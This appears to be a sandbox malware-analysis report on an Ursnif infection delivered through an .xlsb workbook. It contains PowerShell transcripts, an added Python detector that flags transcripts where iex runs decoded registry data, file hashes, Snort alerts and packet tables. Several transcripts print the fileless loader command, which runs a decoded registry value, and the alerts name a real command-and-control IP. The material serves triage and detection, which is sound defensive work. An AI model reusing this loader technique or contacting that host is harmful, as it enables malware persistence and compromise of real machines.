                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210708154749..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 632922 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 5196..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210708154749..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..
                                                                                                                                                            C:\Users\user\Documents\20210708\PowerShell_transcript.632922.yKWYpH3L.20210708154747.txt
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):976
                                                                                                                                                            Entropy (8bit):5.493694549039648
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:BxSAHxvBnkx2DOXUWOLCHGIYBtBCWnHjeTKKjX4CIym1ZJXlfOLCHGIYBtBW:BZRvhkoORFeVnqDYB1ZFFeW
                                                                                                                                                            MD5:612AD7F724C061422CF854B63D07DF41
                                                                                                                                                            SHA1:9161E0269B69126C661C4E17A976C48422F04F71
                                                                                                                                                            SHA-256:60BAE5142EF45D769D43A72D3BC5E898389D215B79706141ED01ED8F218CD4F2
                                                                                                                                                            SHA-512:034CDEB81071B59FEBAC13D2438DA3CDE4D6B0C112825704A72DFDF43F0F77E97E3C73FEE790FD3762A4D60A49DCBCB734BBBD4AA62C8ABE7A1042226D119A96
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210708154748..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 632922 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 3936..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210708154748..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..
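The two PowerShell transcripts above are the most useful triage artifacts in this dropped-file list: they record how the Ursnif stage persists on the host. The loader is stored as a string in the registry value UtilTool under HKCU:\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550, and powershell.exe is launched with `iex ([System.Text.Encoding]::ASCII.GetString((gp <key>).UtilTool))`, so the decoded value is executed without ever touching disk. HKCU\Software\AppDataLow is the part of the user hive that low-integrity processes (Protected Mode Internet Explorer, for example) are allowed to write, which is why it is a favoured staging location. The script below is an added example, not part of the Joe Sandbox report: it parses transcript files of the format shown and flags any iex whose input is a registry value, returning the key and value name an analyst should dump next. The two sample transcripts are constructed from the preview text above (the report's `..` CRLF placeholders turned back into line breaks, header trimmed) plus one benign counter-example; the class and function names are this example's own.

```python
"""Flag PowerShell transcripts in which iex executes a decoded registry value.

Added example for the transcripts listed in this report; not part of the
Joe Sandbox output. TranscriptFinding, parse_transcript, classify_command
and find_registry_iex are this example's own names.
"""
import re
from dataclasses import dataclass

# Constructed sample: the transcript preview above, with the report's '..'
# CRLF placeholders turned back into line breaks and the header trimmed.
SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20210708154749
Username: computer\user
RunAs User: computer\user
Configuration Name:
Machine: 632922 (Microsoft Windows NT 10.0.17134.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))
Process ID: 5196
**********************
Command start time: 20210708154749
**********************
PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))
"""

# Constructed benign transcript: a registry read and an iex that do not
# feed each other must not fire.
BENIGN_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20210708154800
Username: computer\user
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 4100
**********************
PS>Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
PS>iex "Get-Date"
"""

IEX_RE = re.compile(r'\b(?:iex|invoke-expression)\b', re.I)
# "( gp HKCU:...\<guid>).UtilTool": capture the key path and the value name.
REG_READ_RE = re.compile(
    r'\b(?:gp|get-itemproperty)\s+["\']?(HK(?:CU|LM)[^\s)"\']+)["\']?\s*\)\s*\.\s*(\w+)',
    re.I,
)
DECODE_RE = re.compile(r'\[System\.Text\.Encoding\]::\w+\.GetString|FromBase64String', re.I)


@dataclass
class TranscriptFinding:
    process_id: str
    username: str
    registry_key: str
    value_name: str
    reason: str
    command: str


def parse_transcript(text: str):
    """Split a transcript into its 'Key: Value' header and the PS> commands."""
    header, commands = {}, []
    for line in text.splitlines():
        if line.startswith("****"):
            continue
        if line.startswith("PS>"):
            commands.append(line[3:].strip())
            continue
        key, sep, value = line.partition(":")
        if sep and key.strip() and key.strip() not in header:
            header[key.strip()] = value.strip()
    return header, commands


def classify_command(command: str):
    """Return (registry_key, value_name, reason) when iex consumes registry data, else None."""
    if not IEX_RE.search(command):
        return None
    reg = REG_READ_RE.search(command)
    if not reg:
        return None
    reason = "iex executes data read from the registry"
    if DECODE_RE.search(command):
        reason += " after decoding it (GetString/FromBase64String)"
    return reg.group(1), reg.group(2), reason


def find_registry_iex(text: str):
    """Scan the PS> commands and the Host Application line; one finding per key/value."""
    header, commands = parse_transcript(text)
    host = header.get("Host Application", "")
    findings, seen = [], set()
    for cmd in commands + ([host] if host else []):
        hit = classify_command(cmd)
        if hit is None or (hit[0].lower(), hit[1].lower()) in seen:
            continue
        seen.add((hit[0].lower(), hit[1].lower()))
        findings.append(TranscriptFinding(header.get("Process ID", ""), header.get("Username", ""),
                                          hit[0], hit[1], hit[2], cmd))
    return findings


if __name__ == "__main__":
    for f in find_registry_iex(SAMPLE_TRANSCRIPT):
        print(f"PID {f.process_id} ({f.username}): {f.reason}")
        print(f"  dump: {f.registry_key} -> {f.value_name}")
```

Run against the sample it reports PID 5196 and the AppDataLow key and value name; against the benign transcript it reports nothing. The same scan applies to PowerShell ScriptBlock logging (event 4104) and to Sysmon process-creation command lines, since the registry read and the iex appear in one command string there as well. The finding deliberately carries the key and value name rather than the decoded payload: the next step is to export that value from the affected profile so the loader can be decoded offline rather than by running it.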

Static File Info

General

File type: Zip archive data, at least v2.0 to extract
Entropy (8bit): 7.959986621336663
TrID:
• Excel Microsoft Office Binary workbook document (47504/1) 49.73%
• Excel Microsoft Office Open XML Format document (40004/1) 41.88%
• ZIP compressed archive (8000/1) 8.38%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name: documentation_39236.xlsb
File size: 213949
MD5: 31ed7b3f7d7173afe801858e30c0fb62
SHA1: 40376b923682dc858806071f97cb64f781142dbb
SHA256: 8081a3a7be80c197b850d2c1e3cac75944d3fb55fda2b312815f565616366843
SHA512: 0384ab9e41873f5a3e669f4483f7325c66b2978d47bc1285b30a0e26dd34e748fd2f96539781299b159ae402a0d503ccd44ac5f091fc073d5e476c20483968f4
SSDEEP: 3072:GPLcNfKSwCj4DzTB4uN5+8eV6hwIVFvnQCa5wrNvNppmWDzVXImozZHMXe+8ftJ8:dd73uNs7DIrPZPNflV+sOdftJ6Twg5
File Content Preview: PK...........R................docProps/PK..........!.S-..............docProps/app.xml.SMO.1..W...|'.....1....""...zg...{..VI.}'K.,.'.........X-+.@B..X.{...\.}X...|rr......b..\........XC".(.".X.D.H)t%,-....R....aZ.X...Ut.K..N..L.. ....;B..8j...yt.}.4_..g..

File Icon

Icon Hash: 74f0d0d2c6d6d0f4

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                                    Source Port  Dest Port  Source IP    Dest IP
07/08/21-15:46:47.694398  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49755        80         192.168.2.3  165.232.183.49
07/08/21-15:46:47.694398  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49755        80         192.168.2.3  165.232.183.49
07/08/21-15:46:50.491586  ICMP      402      ICMP Destination Unreachable Port Unreachable              -            -          192.168.2.3  8.8.8.8
07/08/21-15:47:30.909945  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49757        80         192.168.2.3  165.232.183.49
07/08/21-15:47:30.909945  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49757        80         192.168.2.3  165.232.183.49
07/08/21-15:47:32.851699  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49759        80         192.168.2.3  165.232.183.49
07/08/21-15:47:35.972897  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49760        80         192.168.2.3  165.232.183.49
07/08/21-15:47:35.972897  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49760        80         192.168.2.3  165.232.183.49
07/08/21-15:47:37.855365  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49762        80         192.168.2.3  165.232.183.49
07/08/21-15:47:37.855365  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49762        80         192.168.2.3  165.232.183.49
07/08/21-15:47:39.574058  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49761        80         192.168.2.3  165.232.183.49
07/08/21-15:47:39.574058  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49761        80         192.168.2.3  165.232.183.49

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jul 8, 2021 15:45:12.662849903 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:12.796746016 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:12.796924114 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:12.798399925 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:12.931030035 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:12.933978081 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:12.934030056 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:12.934077978 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:12.934096098 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:12.934109926 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:12.934134960 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:12.934225082 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:12.935718060 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:12.935817957 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:12.967597961 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.104223013 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.104317904 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.105153084 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.248893976 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.248975039 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.249032974 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.249080896 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.249090910 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.249119997 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.249125957 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.249151945 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.249181986 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.249206066 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.249224901 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.249247074 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.249274015 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.249296904 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.249305010 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.249346018 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.249361992 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.249403000 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.249406099 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.249463081 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.381817102 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.381958961 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.382622957 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.382745981 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383043051 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383093119 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383142948 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383161068 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383173943 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383199930 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383220911 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383240938 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383263111 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383294106 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383301973 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383328915 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383347034 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383368969 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383388996 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383404970 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383415937 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383440018 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383459091 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383476019 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383490086 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383513927 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383539915 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383548975 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383583069 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383585930 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383610010 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383621931 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383662939 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383665085 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383702993 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383706093 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.383730888 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383770943 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.383928061 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.384028912 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.514496088 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.514534950 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.514592886 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.514632940 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.514863014 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.514988899 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.515006065 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.515089035 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.515753984 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.515853882 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.515855074 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.515999079 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.516002893 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.516033888 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.516074896 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.516103029 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.516110897 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.516134977 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.516168118 CEST  49725        443        192.168.2.3     162.241.253.78
Jul 8, 2021 15:45:13.516169071 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.516194105 CEST  443          49725      162.241.253.78  192.168.2.3
Jul 8, 2021 15:45:13.516230106 CEST  443          49725      162.241.253.78  192.168.2.3

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jul 8, 2021 15:44:58.490741014 CEST  64185        53         192.168.2.3  8.8.8.8
Jul 8, 2021 15:44:58.504507065 CEST  53           64185      8.8.8.8      192.168.2.3
Jul 8, 2021 15:44:59.104778051 CEST  65110        53         192.168.2.3  8.8.8.8
Jul 8, 2021 15:44:59.117650986 CEST  53           65110      8.8.8.8      192.168.2.3
Jul 8, 2021 15:45:00.775324106 CEST  58361        53         192.168.2.3  8.8.8.8
Jul 8, 2021 15:45:00.790585995 CEST  53           58361      8.8.8.8      192.168.2.3
Jul 8, 2021 15:45:01.689548969 CEST  63492        53         192.168.2.3  8.8.8.8
Jul 8, 2021 15:45:01.705452919 CEST  53           63492      8.8.8.8      192.168.2.3
Jul 8, 2021 15:45:02.469089985 CEST  60831        53         192.168.2.3  8.8.8.8
Jul 8, 2021 15:45:02.482681036 CEST  53           60831      8.8.8.8      192.168.2.3
Jul 8, 2021 15:45:03.527302027 CEST  60100        53         192.168.2.3  8.8.8.8
Jul 8, 2021 15:45:03.540301085 CEST  53           60100      8.8.8.8      192.168.2.3
Jul 8, 2021 15:45:06.538055897 CEST  53195        53         192.168.2.3  8.8.8.8
Jul 8, 2021 15:45:06.550508022 CEST  53           53195      8.8.8.8      192.168.2.3
Jul 8, 2021 15:45:09.247096062 CEST  50141        53         192.168.2.3  8.8.8.8
Jul 8, 2021 15:45:09.259601116 CEST  53           50141      8.8.8.8      192.168.2.3
Jul 8, 2021 15:45:10.368503094 CEST  53023        53         192.168.2.3  8.8.8.8
Jul 8, 2021 15:45:10.400414944 CEST  49563        53         192.168.2.3  8.8.8.8
Jul 8, 2021 15:45:10.415256023 CEST  53           49563      8.8.8.8      192.168.2.3
Jul 8, 2021 15:45:10.429045916 CEST  53           53023      8.8.8.8      192.168.2.3
Jul 8, 2021 15:45:10.845033884 CEST  51352        53         192.168.2.3  8.8.8.8
Jul 8, 2021 15:45:10.883271933 CEST  53           51352      8.8.8.8      192.168.2.3
Jul 8, 2021 15:45:11.838382959 CEST  51352        53         192.168.2.3  8.8.8.8
Jul 8, 2021 15:45:11.888166904 CEST  53           51352      8.8.8.8      192.168.2.3
Jul 8, 2021 15:45:12.376907110 CEST  59349        53         192.168.2.3  8.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:12.393397093 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:12.538357973 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:12.660362959 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:12.854002953 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:12.867439032 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:13.438555956 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:13.454149008 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:14.180490971 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:14.193964958 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:14.822968960 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:14.839948893 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:15.020694971 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:15.035990000 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:15.725830078 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:15.739042997 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:16.612771034 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:16.626346111 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:17.311503887 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:17.325329065 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:18.037586927 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:18.050470114 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:18.873898983 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:18.888286114 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:30.429289103 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:30.458503962 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:35.873209953 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:35.913908958 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:49.567156076 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:49.600656986 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:52.997692108 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:53.013279915 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:53.949455023 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:53.963741064 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:45:55.503710032 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:45:55.517919064 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:00.317193031 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:00.336724997 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:01.903301001 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:01.917671919 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:02.294727087 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:02.322993040 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:41.217731953 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:41.231363058 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:44.750526905 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:44.764513016 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:46.216243029 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:47.222793102 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:46:47.505951881 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:46:50.491420984 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:14.720967054 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:14.736998081 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:15.708970070 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:15.723954916 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:16.734513044 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:16.746998072 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:18.739809990 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:18.753375053 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:22.756377935 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:22.769054890 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:29.490900993 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:29.511019945 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:30.710268974 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:30.725452900 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:32.668920040 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:32.682585955 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:35.493366003 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:35.783593893 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:37.660630941 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:37.674045086 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:53.472146034 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:53.487234116 CEST53568038.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:54.789647102 CEST5714553192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:54.805146933 CEST53571458.8.8.8192.168.2.3
                                                                                                                                                            Jul 8, 2021 15:47:55.719249964 CEST5535953192.168.2.38.8.8.8
                                                                                                                                                            Jul 8, 2021 15:47:55.732538939 CEST53553598.8.8.8192.168.2.3
